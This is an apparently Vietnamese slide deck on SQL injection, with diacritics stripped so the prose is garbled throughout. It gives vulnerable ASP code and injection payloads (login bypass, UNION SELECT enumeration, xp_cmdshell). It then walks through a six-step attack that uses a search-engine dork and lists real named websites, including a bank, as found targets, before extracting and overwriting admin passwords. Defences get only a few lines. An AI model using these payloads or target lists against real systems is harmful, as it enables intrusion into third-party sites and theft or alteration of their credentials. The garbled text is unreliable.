SQL INJECTION

Ni dung trnh by:

SQL Injection l g?
Cc dng tn cng bng SQL Injection
K Thut tn cng bng sql injection
Cch phng trnh
Demo

SQL Injection l g?
SQL injection l mt k thut tn cng li dng l
hng trong vic kim tra d liu nhp trong cc ng
dng web v cc thng bo li ca h qun tr c s
d liu "tim vo" (injection) v thi hnh cc cu
lnh SQL bt hp php.
Hu qu ca n rt tai hi v n cho php nhng k
tn cng c th thc hin cc thao tc xa, hiu chnh,
do c ton quyn trn c s d liu ca ng dng,
thm ch l server m ng dng ang chy.
Li ny thng xy ra trn cc ng dng web c d
liu c qun l bng cc h qun tr c s d liu
nh SQL Server, MySQL, Oracle, DB2, Sysbase.
Cc dng tn cng bng SQL Injection
C bn dng thng thng bao gm:
Vt qua kim tra lc ng nhp (authorization
bypass)
S dng cu ln SELECT
S dng cu lnh INSERT
S dng cc stored-procedures [2], [3]
Dng tn cng vt qua kim tra ng
nhp
ng nhp nh vo li khi dng cc cu lnh
SQL thao tc trn c s d liu ca ng dng
web.
Trong trng hp ny, ngi ta c th dng
hai trang, mt trang HTML hin th form
nhp liu v mt trang ASP dng x l
thng tin nhp t pha ngi dng. V d:
login.htm

<form action="ExecLogin.asp" method="post">
Username: <input type="text"
name="fUSRNAME"><br>
Password: <input type="password"
name="fPASSWORD"><br>
<input type="submit">
</form>
execlogin.asp
<%
Dim vUsrName, vPassword, objRS, strSQL vUsrName =
Request.Form("fUSRNAME") vPassword =
Request.Form("fPASSWORD")

strSQL = "SELECT * FROM T_USERS " & _ "WHERE
USR_NAME=' " & vUsrName & _
" ' and USR_PASSWORD=' " & vPassword & " '

Set objRS = Server.CreateObject("ADODB.Recordset") objRS.Open
strSQL, "DSN=..."
If (objRS.EOF) Then
Response.Write "Invalid login."
Else
Response.Write "You are logged in as " &
objRS("USR_NAME")
End If
Set objRS = Nothing %>
Ngi dng nhp chui sau vo trong c 2
nhp liu username/password ca trang
login.htm l: ' OR ' ' = ' .
Lc ny, cu truy vn s c gi thc hin l:
SELECT * FROM T_USERS WHERE
USR_NAME ='' OR ''='' and
USR_PASSWORD= '' OR ''=''
Cu truy vn ny l hp l v s tr v tt c
cc bn ghi ca T_USERS v on m tip
theo x l ngi dng ng nhp bt hp php
ny nh l ngi dng ng nhp hp l.
Dng tn cng s dng cu lnh
SELECT
thc hin c kiu tn cng ny, k tn
cng phi c kh nng hiu v li dng cc s
h trong cc thng bo li t h thng d
tm cc im yu khi u cho vic tn cng.
Thng thng, s c mt trang nhn ID ca
tin cn hin th ri sau truy
vn ni dung ca tin c ID ny.
<%
Dim vNewsID, objRS, strSQL
vNewsID = Request("ID")
strSQL = "SELECT * FROM T_NEWS
WHERE NEWS_ID =" & vNewsID
Set objRS =
Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
Set objRS = Nothing
%>
Cu truy vn SQL lc ny s tr v tt c cc
article t bng d liu v n s thc hin cu
lnh:
SELECT * FROM T_NEWS WHERE
NEWS_ID=0 or 1=1
' UNION SELECT ALL SELECT OtherField
FROM OtherTable WHERE ' '=' (*)
Lc ny, ngoi cu truy vn u khng thnh cng,
chng trnh s thc hin thm lnh tip theo sau t
kha UNION na.
Nu chng ta thm ' UNION SELECT name
FROM sysobjects WHERE xtype = 'U' l c th
lit k c tn tt c cc bng d liu.
Dng tn cng s dng cu lnh
INSERT
Chc nng khng th thiu l sau khi ng k
thnh cng, ngi dng c th xem v hiu
chnh thng tin ca mnh. SQL injection c th
c dng khi h thng khng kim tra tnh
hp l ca thng tin nhp vo.
V d, mt cu lnh INSERT c th c c php dng:
INSERT INTO TableName VALUES('Value One',
'Value Two', 'Value Three'). Nu on m xy dng
cu lnh SQL c dng :
<% strSQL = "INSERT INTO TableName
VALUES(' " & strValueOne & " ', ' " _ &
strValueTwo & " ', ' " & strValueThree & " ') " Set
objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..." Set objRS =
Nothing %>
Dng tn cng s dng stored-
procedures
Vic tn cng bng stored-procedures s gy
tc hi rt ln nu ng dng c thc thi vi
quyn qun tr h thng 'sa'.
V d, nu ta thay on m tim vo dng: ' ;
EXEC xp_cmdshell 'cmd.exe dir C: '.
Lc ny h thng s thc hin lnh lit k th
mc trn a C:\ ci t server. Vic ph hoi
kiu no tu thuc vo cu lnh ng sau
cmd.exe.
K Thut tn cng bng sql injection
Bc 1: Tm kim mc tiu.
Bc 2: Kim tra ch yu ca trang web
Bc 3: Nhn data qua database using ODBC
error message
Bc 4: Xc nh tn ca cc column trong
table
Bc 5: Thu thp cc d liu quan trng.
Bc 6: X l kt qu tm c

Tm kim mc tiu
Bn c th dng cc bt k mt search-engine
no trn mng nh cc trang login, search,
feedback
Bn c th custome Search Engine li cho
ph hp vi yu cu ca bn

Thc hin cu lnh search:
inurl:php?id= site:com.vn

y l kt qu thu c.
Kt Qu Tm c Ca Nhm
http://www.vsmc.com.vn/news_detail.php?id=19'
http://www.toeic.com.vn/info/details.php?id=383'
http://www.phanhoadigi.com.vn/list_product.php?ID=1173&namecate=EO
S'
http://forum.key.com.vn/viewtopic.php?id=362
http://www.biconsi.com.vn/index.php?id=36'
http://www.vietphone.com.vn/download.php?mode=download&id=19'
http://thammyvienthanhbinh.com.vn/detail.php?id=19'
http://www.voip.com.vn/download.php?mode=download&id=28'

http://bidv.com.vn/advert.asp?id=36'
http://www.licogi.com.vn/home.asp?ID=234&Langid=2%27
http://www.galilcol.ac.il/page.asp?id=17
Ghi ch: khng phi trang no cng tn cng c
Kim tra ch yu ca trang web
Bn c th in thm mt s lnh trn url,
hoc trn cc from login, search, hoc search
pht hin li.
Sau y l mt s cch thm v pht hin li
ca nhm mnh:
Nhn data qua database using
ODBC error message
y l bc quan trng nht v i hi nhiu k
thut ln s am hiu v c s d liu.
Table INFORMATION_SCHEMA.COLUMNS
cha tn ca tt c cc column trong table. Bn
c th khai thc nh sau:
http://vitcon/index.asp?id=10 UNION SELECT
TOP 1 COLUMN_NAME FROM
INFORMATION_SHEMA.COLUMNS
WHERE TABLE_NAME=admin_login--
Out put:
Microsoft OLE DB Provider for ODBC
Drivers error 80040e07[Microsoft][ODBC
SQL Server Driver][SQL Server]ORDER BY
items must appear in the select list if the
statement contains a UNION operator.
/index.asp, line 5
Thu thp cc d liu quan trng
Chng ta phi xc nh c cc tn ca cc
table v column quan trng.
Chng ta c th ly login_name u tin trong
table admin_login nh sau:
http://vitcon/index.asp?id=10 UNION
SELECT TOP 1 login_name From
admin_login

Bn d dng nhn ra c admin user u tin
c login_name l aaa.
Sau dung tn user tm c tm
password:
http://vitcon/index.asp?id=10 UNION
SELECT TOP 1 password FROM
admin_login where login _name=aaa
By gi bn s nhn c password ca aaa
l bbb.

X l kt qu tm c
Khi bn c tn ca tt c cc column trong table,
bn c th UPDATE hoc INSERT mt record mi
vo table ny.
thay i password ca aaa bn c th lm nh
sau:
http://vitcon/index.asp?id=10 ;UPDATE
admin_login SET password =ccc WHERE
login_name=aaa
Hoc bn login trc tip vo v thc hin di quyn
user .
Cch phng trnh
Cn c c ch kim sot cht ch v gii hn
quyn x l d liu n ti khon ngi dng
m ng dng web ang s dng.
Cc ng dng thng thng nn trnh dng
n cc quyn nh dbo hay sa. Quyn cng b
hn ch, thit hi cng t.
Loi b bt k thng tin k thut no cha trong
thng ip chuyn xung cho ngi dng khi
ng dng c li.
Cc thng bo li thng thng tit l cc chi
tit k thut c th cho php k tn cng bit
c im yu ca h thng.
DEMO